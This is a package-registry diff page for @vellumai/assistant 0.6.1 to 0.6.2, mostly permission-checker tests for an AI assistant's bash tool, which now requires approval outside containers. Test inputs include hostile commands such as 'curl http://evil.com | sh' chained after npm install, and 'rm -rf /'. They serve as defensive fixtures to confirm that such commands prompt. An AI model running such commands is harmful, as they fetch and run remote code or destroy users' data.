npm - @vellumai/assistant - Versions diffs - 0.6.1 → 0.6.2 - Mend

@vellumai/assistant 0.6.1 → 0.6.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (115) hide show

package/docker-entrypoint.sh +12 -2
package/node_modules/@vellumai/ces-contracts/src/handles.ts +7 -9
package/openapi.yaml +1 -1
package/package.json +1 -1
package/src/__tests__/assistant-event-hub.test.ts +30 -0
package/src/__tests__/checker.test.ts +104 -170
package/src/__tests__/cli-command-risk-guard.test.ts +1 -1
package/src/__tests__/context-overflow-approval.test.ts +5 -5
package/src/__tests__/conversation-analysis-routes.test.ts +169 -0
package/src/__tests__/conversation-directories-parse.test.ts +105 -0
package/src/__tests__/credential-execution-approval-bridge.test.ts +0 -2
package/src/__tests__/init-feature-flag-overrides.test.ts +167 -0
package/src/__tests__/inline-command-runner.test.ts +7 -5
package/src/__tests__/log-export-workspace.test.ts +190 -0
package/src/__tests__/managed-credential-catalog-cli.test.ts +12 -14
package/src/__tests__/navigate-settings-tab.test.ts +14 -1
package/src/__tests__/notification-broadcaster.test.ts +65 -0
package/src/__tests__/onboarding-template-contract.test.ts +5 -4
package/src/__tests__/pkb-autoinject.test.ts +96 -0
package/src/__tests__/require-fresh-approval.test.ts +0 -2
package/src/__tests__/sandbox-diagnostics.test.ts +1 -32
package/src/__tests__/terminal-sandbox.test.ts +1 -1
package/src/__tests__/terminal-tools.test.ts +2 -5
package/src/__tests__/test-preload.ts +14 -0
package/src/__tests__/tool-domain-event-publisher.test.ts +0 -1
package/src/__tests__/tool-executor-lifecycle-events.test.ts +1 -8
package/src/__tests__/tool-executor.test.ts +0 -1
package/src/__tests__/transport-hints-queue.test.ts +77 -0
package/src/__tests__/trust-store.test.ts +4 -4
package/src/__tests__/workspace-migration-030-seed-pkb-autoinject.test.ts +168 -0
package/src/__tests__/workspace-policy.test.ts +2 -7
package/src/agent/loop.ts +0 -29
package/src/channels/types.ts +5 -0
package/src/cli/__tests__/run-assistant-command.ts +34 -7
package/src/cli/__tests__/unknown-command.test.ts +33 -0
package/src/cli/commands/default-action.ts +68 -1
package/src/cli/commands/oauth/__tests__/connect.test.ts +27 -0
package/src/cli/commands/oauth/connect.ts +11 -0
package/src/cli/commands/platform/__tests__/connect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/disconnect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/status.test.ts +1 -1
package/src/cli/program.ts +9 -2
package/src/config/assistant-feature-flags.ts +59 -55
package/src/config/bundled-skills/app-builder/SKILL.md +87 -4
package/src/config/bundled-skills/gmail/SKILL.md +11 -6
package/src/config/bundled-skills/gmail/TOOLS.json +1 -1
package/src/config/bundled-skills/gmail/tools/gmail-sender-digest.ts +2 -1
package/src/config/bundled-skills/settings/TOOLS.json +1 -1
package/src/config/bundled-skills/settings/tools/navigate-settings-tab.ts +8 -3
package/src/config/feature-flag-registry.json +2 -2
package/src/config/schemas/services.ts +8 -0
package/src/credential-execution/approval-bridge.ts +0 -1
package/src/credential-execution/managed-catalog.ts +3 -7
package/src/daemon/config-watcher.ts +6 -2
package/src/daemon/context-overflow-approval.ts +0 -1
package/src/daemon/conversation-agent-loop.ts +33 -12
package/src/daemon/conversation-attachments.ts +0 -1
package/src/daemon/conversation-messaging.ts +3 -0
package/src/daemon/conversation-process.ts +18 -2
package/src/daemon/conversation-queue-manager.ts +8 -0
package/src/daemon/conversation-runtime-assembly.ts +64 -7
package/src/daemon/conversation-surfaces.ts +65 -0
package/src/daemon/conversation-tool-setup.ts +0 -3
package/src/daemon/conversation.ts +3 -5
package/src/daemon/handlers/conversations.ts +2 -1
package/src/daemon/handlers/shared.ts +7 -0
package/src/daemon/lifecycle.ts +21 -1
package/src/daemon/message-types/conversations.ts +4 -0
package/src/daemon/message-types/messages.ts +0 -1
package/src/daemon/message-types/notifications.ts +12 -0
package/src/daemon/message-types/settings.ts +12 -0
package/src/daemon/server.ts +21 -24
package/src/daemon/transport-hints.ts +33 -0
package/src/index.ts +1 -1
package/src/memory/conversation-crud.ts +15 -10
package/src/memory/conversation-directories.ts +39 -0
package/src/memory/conversation-group-migration.ts +65 -5
package/src/memory/embedding-local.ts +1 -1
package/src/memory/graph/capability-seed.ts +3 -5
package/src/memory/group-crud.ts +25 -9
package/src/messaging/provider.ts +1 -1
package/src/notifications/broadcaster.ts +6 -0
package/src/notifications/conversation-pairing.ts +12 -4
package/src/notifications/emit-signal.ts +14 -0
package/src/notifications/signal.ts +11 -0
package/src/oauth/platform-connection.test.ts +2 -2
package/src/oauth/seed-providers.ts +1 -0
package/src/permissions/checker.ts +3 -3
package/src/permissions/defaults.ts +7 -8
package/src/permissions/prompter.ts +0 -2
package/src/platform/client.ts +1 -1
package/src/prompts/templates/BOOTSTRAP.md +14 -5
package/src/prompts/templates/SOUL.md +11 -11
package/src/runtime/assistant-event-hub.ts +22 -0
package/src/runtime/auth/token-service.ts +8 -0
package/src/runtime/routes/conversation-analysis-routes.ts +18 -6
package/src/runtime/routes/conversation-routes.ts +9 -3
package/src/runtime/routes/group-routes.ts +22 -8
package/src/runtime/routes/log-export/AGENTS.md +104 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist-error-contract.test.ts +103 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist.test.ts +716 -0
package/src/runtime/routes/log-export/workspace-allowlist.ts +458 -0
package/src/runtime/routes/log-export-routes.ts +18 -3
package/src/skills/inline-command-runner.ts +12 -14
package/src/tools/permission-checker.ts +0 -18
package/src/tools/secret-detection-handler.ts +0 -1
package/src/tools/skills/sandbox-runner.ts +3 -6
package/src/tools/terminal/sandbox-diagnostics.ts +4 -4
package/src/tools/terminal/sandbox.ts +4 -1
package/src/tools/terminal/shell.ts +3 -5
package/src/tools/types.ts +0 -3
package/src/watcher/provider-types.ts +1 -1
package/src/workspace/migrations/029-seed-pkb.ts +1 -0
package/src/workspace/migrations/030-seed-pkb-autoinject.ts +73 -0
package/src/workspace/migrations/registry.ts +2 -0

package/docker-entrypoint.sh CHANGED Viewed

@@ -16,19 +16,29 @@ BUN_OPTIONS="${BUN_OPTIONS:-}"
 if [ -n "${VELLUM_PROFILER_RUN_ID:-}" ] && [ -n "${VELLUM_PROFILER_MODE:-}" ]; then
   PROFILER_WORKSPACE="${VELLUM_WORKSPACE_DIR:-$HOME/.vellum/workspace}"
   PROFILER_RUN_DIR="${PROFILER_WORKSPACE}/data/profiler/runs/${VELLUM_PROFILER_RUN_ID}"
+  PROFILER_HEAP_DIR="${PROFILER_RUN_DIR}"
   # Ensure the run directory exists
   mkdir -p "${PROFILER_RUN_DIR}"
+  # Bun resolves heap profile output more reliably when the directory is
+  # expressed relative to the current working directory.
+  if command -v realpath >/dev/null 2>&1; then
+    PROFILER_HEAP_DIR="$(
+      realpath --relative-to="$(pwd)" "${PROFILER_RUN_DIR}" 2>/dev/null ||
+        printf '%s' "${PROFILER_RUN_DIR}"
+    )"
+  fi
   case "${VELLUM_PROFILER_MODE}" in
     cpu)
       BUN_OPTIONS="${BUN_OPTIONS} --cpu-prof --cpu-prof-md --cpu-prof-dir=${PROFILER_RUN_DIR}"
       ;;
     heap)
-      BUN_OPTIONS="${BUN_OPTIONS} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_RUN_DIR}"
+      BUN_OPTIONS="${BUN_OPTIONS} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_HEAP_DIR}"
       ;;
     cpu+heap|heap+cpu)
-      BUN_OPTIONS="${BUN_OPTIONS} --cpu-prof --cpu-prof-md --cpu-prof-dir=${PROFILER_RUN_DIR} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_RUN_DIR}"
+      BUN_OPTIONS="${BUN_OPTIONS} --cpu-prof --cpu-prof-md --cpu-prof-dir=${PROFILER_RUN_DIR} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_HEAP_DIR}"
       ;;
     *)
       echo "Warning: unknown VELLUM_PROFILER_MODE '${VELLUM_PROFILER_MODE}', skipping profiler flags" >&2

package/node_modules/@vellumai/ces-contracts/src/handles.ts CHANGED Viewed

@@ -146,14 +146,12 @@ export function parseHandle(raw: string): ParseHandleResult {
     }
     case HandleType.LocalOAuth: {
-      // providerKey is typically a bare name (e.g. "google"), but legacy handles
-      // may contain a colon (e.g. "integration:google"), so we split on the
-      // *last* "/" to separate providerKey from connectionId.
-      const lastSlashIdx = rest.lastIndexOf("/");
+      // Split providerKey from connectionId.
+      const slashIdx = rest.indexOf("/");
       if (
-        lastSlashIdx === -1 ||
-        lastSlashIdx === 0 ||
-        lastSlashIdx === rest.length - 1
+        slashIdx === -1 ||
+        slashIdx === 0 ||
+        slashIdx === rest.length - 1
       ) {
         return {
           ok: false,
@@ -164,8 +162,8 @@ export function parseHandle(raw: string): ParseHandleResult {
         ok: true,
         handle: {
           type: HandleType.LocalOAuth,
-          providerKey: rest.slice(0, lastSlashIdx),
-          connectionId: rest.slice(lastSlashIdx + 1),
+          providerKey: rest.slice(0, slashIdx),
+          connectionId: rest.slice(slashIdx + 1),
           raw,
         },
       };

package/openapi.yaml CHANGED Viewed

@@ -3,7 +3,7 @@
 openapi: 3.0.0
 info:
   title: Vellum Assistant API
-  version: 0.6.0
+  version: 0.6.1
   description: Auto-generated OpenAPI specification for the Vellum Assistant runtime HTTP server.
 servers:
   - url: http://127.0.0.1:7821

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "@vellumai/assistant",
-  "version": "0.6.1",
+  "version": "0.6.2",
   "license": "MIT",
   "type": "module",
   "exports": {

package/src/__tests__/assistant-event-hub.test.ts CHANGED Viewed

@@ -102,6 +102,36 @@ describe("AssistantEventHub — fanout", () => {
     const hub = new AssistantEventHub();
     await expect(hub.publish(makeEvent())).resolves.toBeUndefined();
   });
+  test("hasSubscribersForEvent returns true for assistant-wide subscribers", () => {
+    const hub = new AssistantEventHub();
+    hub.subscribe({ assistantId: "ast_1" }, () => {});
+    expect(
+      hub.hasSubscribersForEvent({
+        assistantId: "ast_1",
+        conversationId: "sess_A",
+      }),
+    ).toBe(true);
+  });
+  test("hasSubscribersForEvent honors conversation scoping", () => {
+    const hub = new AssistantEventHub();
+    hub.subscribe({ assistantId: "ast_1", conversationId: "sess_A" }, () => {});
+    expect(
+      hub.hasSubscribersForEvent({
+        assistantId: "ast_1",
+        conversationId: "sess_A",
+      }),
+    ).toBe(true);
+    expect(
+      hub.hasSubscribersForEvent({
+        assistantId: "ast_1",
+        conversationId: "sess_B",
+      }),
+    ).toBe(false);
+  });
 });
 // ── Unsubscribe / cleanup ────────────────────────────────────────────────────

package/src/__tests__/checker.test.ts CHANGED Viewed

@@ -48,14 +48,12 @@ mock.module("../util/logger.js", () => ({
 interface TestConfig {
   permissions: { mode: "strict" | "workspace" };
   skills: { load: { extraDirs: string[] } };
-  sandbox: { enabled: boolean };
   [key: string]: unknown;
 }
 const testConfig: TestConfig = {
   permissions: { mode: "workspace" },
   skills: { load: { extraDirs: [] } },
-  sandbox: { enabled: true },
 };
 mock.module("../config/loader.js", () => ({
@@ -640,49 +638,23 @@ describe("Permission Checker", () => {
   // ── check (decision logic) ─────────────────────────────────────
   describe("check", () => {
-    test("sandbox bash auto-allows all risk levels via default rule", async () => {
-      // High risk
+    test("bash follows risk-based policy (no default allow rule outside container)", async () => {
+      // High risk → prompt
       const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(high.decision).toBe("allow");
-      expect(high.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(high.decision).toBe("prompt");
-      // Medium risk
+      // Medium risk → prompt
       const med = await check(
         "bash",
         { command: "curl https://example.com" },
         "/tmp",
       );
-      expect(med.decision).toBe("allow");
-      expect(med.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(med.decision).toBe("prompt");
-      // Low risk
+      // Low risk → auto-allowed via risk-based fallback
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.matchedRule?.id).toBe("default:allow-bash-global");
-    });
-    test("bash prompts when sandbox is disabled (no global allow rule)", async () => {
-      testConfig.sandbox.enabled = false;
-      clearCache();
-      try {
-        const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-        expect(high.decision).toBe("prompt");
-        const med = await check(
-          "bash",
-          { command: "curl https://example.com" },
-          "/tmp",
-        );
-        expect(med.decision).toBe("prompt");
-        // Low risk still auto-allows via the normal risk-based fallback
-        const low = await check("bash", { command: "ls" }, "/tmp");
-        expect(low.decision).toBe("allow");
-        expect(low.reason).toContain("Low risk");
-      } finally {
-        testConfig.sandbox.enabled = true;
-        clearCache();
-      }
+      expect(low.reason).toContain("Low risk");
     });
     test("host_bash high risk → always prompt", async () => {
@@ -2337,11 +2309,11 @@ describe("Permission Checker", () => {
   // ── strict mode: no implicit allow (PR 21) ───────────────────
   describe("strict mode — no implicit allow (PR 21)", () => {
-    test("sandbox bash auto-allows in strict mode (default rule is a matching rule)", async () => {
+    test("bash prompts in strict mode (no default allow rule outside container)", async () => {
       testConfig.permissions.mode = "strict";
       const result = await check("bash", { command: "ls" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("Strict mode");
     });
     test("host_bash prompts low risk in strict mode (default ask rule matches)", async () => {
@@ -2462,10 +2434,9 @@ describe("Permission Checker", () => {
       expect(result.decision).toBe("prompt");
     });
-    test("sandbox bash auto-allows high-risk via default allowHighRisk rule", async () => {
+    test("bash prompts for high-risk without default allow rule", async () => {
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
     });
     test("medium-risk tool with allow rule is NOT affected by allowHighRisk", async () => {
@@ -3657,11 +3628,11 @@ describe("Permission Checker", () => {
     //    explicit matching rule. ──────────────────────────────────────
     describe("Invariant 1: strict mode requires explicit matching rule for every tool", () => {
-      test("sandbox bash auto-allows in strict mode (default rule matches)", async () => {
+      test("bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check("bash", { command: "echo hello" }, "/tmp");
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
+        expect(result.reason).toContain("Strict mode");
       });
       test("low-risk host_bash prompts in strict mode (default ask rule matches)", async () => {
@@ -3709,15 +3680,14 @@ describe("Permission Checker", () => {
         expect(result.reason).toContain("Strict mode");
       });
-      test("high-risk sandbox bash auto-allows in strict mode (default allowHighRisk rule)", async () => {
+      test("high-risk bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check(
           "bash",
           { command: "sudo apt update" },
           "/tmp",
         );
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
       });
       test("high-risk host_bash command with no user rule prompts in strict mode", async () => {
@@ -4130,20 +4100,39 @@ describe("Permission Checker", () => {
     test("getDefaultRuleTemplates tolerates partial config mocks", () => {
       const originalSkills = testConfig.skills;
-      const originalSandbox = testConfig.sandbox;
       try {
         testConfig.skills = {} as any;
-        testConfig.sandbox = {} as any;
         const templates = getDefaultRuleTemplates();
         expect(Array.isArray(templates)).toBe(true);
         expect(templates.some((t) => t.id.includes("extra-"))).toBe(false);
+        // bash allow rule is conditional on IS_CONTAINERIZED, not present in test env
         expect(
           templates.some((t) => t.id === "default:allow-bash-global"),
-        ).toBe(true);
+        ).toBe(false);
       } finally {
         testConfig.skills = originalSkills;
-        testConfig.sandbox = originalSandbox;
+      }
+    });
+    test("getDefaultRuleTemplates includes bash allow rule when IS_CONTAINERIZED", () => {
+      const orig = process.env.IS_CONTAINERIZED;
+      process.env.IS_CONTAINERIZED = "true";
+      try {
+        const templates = getDefaultRuleTemplates();
+        const bashRule = templates.find(
+          (t) => t.id === "default:allow-bash-global",
+        );
+        expect(bashRule).toBeDefined();
+        expect(bashRule!.tool).toBe("bash");
+        expect(bashRule!.pattern).toBe("**");
+        expect(bashRule!.allowHighRisk).toBe(true);
+      } finally {
+        if (orig === undefined) {
+          delete process.env.IS_CONTAINERIZED;
+        } else {
+          process.env.IS_CONTAINERIZED = orig;
+        }
       }
     });
   });
@@ -4407,13 +4396,14 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
     testConfig.skills = { load: { extraDirs: [] } };
   });
-  test("proxied bash follows normal rules (auto-allowed by default rule)", async () => {
+  test("proxied bash follows risk-based policy (medium risk → prompt outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       "/tmp",
     );
-    expect(result.decision).toBe("allow");
+    // Without the containerized bash allow rule, proxied medium-risk bash prompts
+    expect(result.decision).toBe("prompt");
   });
   test("proxied bash caps high-risk commands to medium", async () => {
@@ -4427,7 +4417,8 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
   test("pipe to python3 -c is not high risk (inline code, not stdin exec)", async () => {
     const risk = await classifyRisk("bash", {
-      command: 'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
+      command:
+        'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
     });
     expect(risk).toBe(RiskLevel.Low);
   });
@@ -4439,7 +4430,7 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
     expect(risk).toBe(RiskLevel.High);
   });
-  test("proxied bash with high-risk command is auto-allowed by default rule", async () => {
+  test("proxied bash with high-risk command prompts (medium risk cap, no default allow rule)", async () => {
     const result = await check(
       "bash",
       {
@@ -4448,7 +4439,8 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
       },
       "/tmp",
     );
-    expect(result.decision).toBe("allow");
+    // High risk capped to medium by proxied mode, but still prompts without the bash allow rule
+    expect(result.decision).toBe("prompt");
   });
   test("host_bash with network_mode=proxied follows normal flow", async () => {
@@ -4676,8 +4668,8 @@ describe("scope matching behavior", () => {
       { command: "npm install" },
       "/home/user/other-project",
     );
-    // npm install is Low risk, so it falls through to auto-allow via the
-    // default sandbox bash rule, not via the project-scoped rule.
+    // npm install is Low risk, so it's auto-allowed via the risk-based
+    // fallback, not via the project-scoped rule.
     // The key assertion is that the project-scoped rule is NOT the matched rule.
     if (result.matchedRule) {
       expect(result.matchedRule.scope).not.toBe(projectDir);
@@ -4759,79 +4751,37 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
     expect(result.reason).toContain("Low risk");
   });
-  // ── bash (sandbox) — default rule matches, workspace mode not reached ──
+  // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
-  test("bash in workspace with sandbox (non-proxied) → allow via default rule", async () => {
+  test("bash in workspace (low risk) → allow via risk-based fallback, not workspace mode", async () => {
     const result = await check("bash", { command: "ls -la" }, workspaceDir);
     expect(result.decision).toBe("allow");
-    // Allowed via the default sandbox bash rule, not workspace mode
-    expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-  });
-  // ── bash sandbox gate — workspace auto-allow depends on sandbox being enabled ──
-  test("bash with sandbox disabled in workspace mode → falls through to risk-based policy (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      // Should NOT be auto-allowed via workspace mode
-      expect(result.reason).not.toContain("Workspace mode");
-      // With sandbox disabled, no default bash allow rule either, so it falls through to risk-based policy
-      expect(result.decision).toBe("allow");
-      expect(result.reason).toContain("Low risk");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
-  });
-  test("bash with sandbox enabled in workspace mode → auto-allowed via default rule", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = true;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      expect(result.decision).toBe("allow");
-      // With sandbox enabled, the default bash allow rule matches before workspace mode
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+    // Not auto-allowed via workspace mode — bash falls through to risk-based policy
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.reason).toContain("Low risk");
   });
-  test("bash with sandbox disabled in workspace mode — medium risk command → prompt (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      // An unknown program is medium risk; without sandbox, workspace auto-allow is blocked
-      const result = await check(
-        "bash",
-        { command: "some-unknown-program --flag" },
-        workspaceDir,
-      );
-      expect(result.reason).not.toContain("Workspace mode");
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+  test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {
+    // An unknown program is medium risk; without container, workspace auto-allow is blocked
+    const result = await check(
+      "bash",
+      { command: "some-unknown-program --flag" },
+      workspaceDir,
+    );
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.decision).toBe("prompt");
   });
   // ── proxied bash — risk capped at medium ──
-  test("bash with network_mode=proxied → allow (risk capped at medium)", async () => {
+  test("bash with network_mode=proxied → prompt (medium risk, not auto-allowed outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       workspaceDir,
     );
-    expect(result.decision).toBe("allow");
+    // Without container, bash isn't auto-allowed via workspace mode; proxied caps at medium → prompt
+    expect(result.decision).toBe("prompt");
   });
   // ── host tools — default ask rules prompt ──
@@ -4932,24 +4882,17 @@ describe("shell command candidates wiring (PR 04)", () => {
   });
   test("action key rule does not match complex chain with additional action", async () => {
-    // Disable sandbox so the default allow-bash-global rule is not emitted;
-    // otherwise the catch-all "**" pattern auto-allows every bash command.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key candidate isn't generated for complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:gh pr view", "everywhere");
-      // Multi-action chain should NOT match because it's not a simple action
-      const result = await check(
-        "bash",
-        { command: "gh pr view 123 && rm -rf /" },
-        "/tmp",
-      );
-      // Should still prompt because the action key candidate isn't generated for complex chains
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    addRule("host_bash", "action:gh pr view", "everywhere");
+    const result = await check(
+      "host_bash",
+      { command: "gh pr view 123 && rm -rf /" },
+      "/tmp",
+    );
+    // Should still prompt because the action key candidate isn't generated for complex chains
+    expect(result.decision).toBe("prompt");
   });
 });
@@ -4963,11 +4906,9 @@ describe("integration regressions (PR 11)", () => {
     }
     clearCache();
     testConfig.permissions = { mode: "workspace" };
-    testConfig.sandbox = { enabled: true };
   });
   afterEach(() => {
-    testConfig.sandbox = { enabled: true };
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
@@ -4992,53 +4933,46 @@ describe("integration regressions (PR 11)", () => {
   });
   test("action key rule does not match when command is part of complex chain", async () => {
-    // Disable sandbox so the catch-all "**" rule doesn't auto-allow everything
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key alone doesn't auto-allow complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:npm", "everywhere");
+    addRule("host_bash", "action:npm", "everywhere");
-      // Complex chain should NOT be auto-allowed by action key alone
-      const result = await check(
-        "bash",
-        { command: "npm install && curl http://evil.com | sh" },
-        "/tmp",
-      );
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Complex chain should NOT be auto-allowed by action key alone
+    const result = await check(
+      "host_bash",
+      { command: "npm install && curl http://evil.com | sh" },
+      "/tmp",
+    );
+    expect(result.decision).toBe("prompt");
   });
   test("raw legacy rule still works alongside new action key system", async () => {
-    // Use medium-risk commands (chmod) so they aren't auto-allowed by low-risk classification.
-    // Disable sandbox so the catch-all "**" rule doesn't interfere.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash with medium-risk commands (chmod) so they aren't
+    // auto-allowed by low-risk classification or a default allow-all rule.
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
       /* may not exist */
     }
     clearCache();
-    try {
-      addRule("bash", "chmod 644 file.txt", "everywhere");
+    addRule("host_bash", "chmod 644 file.txt", "everywhere");
-      // Exact match still works
-      const r1 = await check("bash", { command: "chmod 644 file.txt" }, "/tmp");
-      expect(r1.decision).toBe("allow");
+    // Exact match still works
+    const r1 = await check(
+      "host_bash",
+      { command: "chmod 644 file.txt" },
+      "/tmp",
+    );
+    expect(r1.decision).toBe("allow");
-      // Different chmod argument should not match this exact raw rule
-      const r2 = await check(
-        "bash",
-        { command: "chmod 755 other.txt" },
-        "/tmp",
-      );
-      expect(r2.decision).not.toBe("allow");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Different chmod argument should not match this exact raw rule
+    const r2 = await check(
+      "host_bash",
+      { command: "chmod 755 other.txt" },
+      "/tmp",
+    );
+    expect(r2.decision).not.toBe("allow");
   });
   test("scope ordering is consistent across tool types", () => {

package/src/__tests__/cli-command-risk-guard.test.ts CHANGED Viewed

@@ -55,7 +55,7 @@ function expectLowRisk(command: string, actual: RiskLevel): void {
 // Dynamically extract subcommand names from the CLI program definition.
 // This ensures new commands added to program.ts are automatically covered
 // by this guard test without manual list maintenance.
-const program = buildCliProgram();
+const program = await buildCliProgram();
 const ASSISTANT_SUBCOMMANDS = program.commands.map((c) => c.name());
 describe("CLI command risk guard: assistant commands", () => {

package/src/__tests__/context-overflow-approval.test.ts CHANGED Viewed

@@ -55,8 +55,8 @@ describe("requestCompressionApproval", () => {
     await requestCompressionApproval(prompter);
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // persistentDecisionsAllowed is index 9
-    expect(args[9]).toBe(false);
+    // persistentDecisionsAllowed is index 8
+    expect(args[8]).toBe(false);
   });
   test("includes a description in the input", async () => {
@@ -119,8 +119,8 @@ describe("requestCompressionApproval", () => {
     });
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // signal is index 10
-    expect(args[10]).toBe(controller.signal);
+    // signal is index 9
+    expect(args[9]).toBe(controller.signal);
   });
   test("works without signal option", async () => {
@@ -130,7 +130,7 @@ describe("requestCompressionApproval", () => {
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
     // signal should be undefined when not provided
-    expect(args[10]).toBeUndefined();
+    expect(args[9]).toBeUndefined();
   });
   // ── Tool name constant ──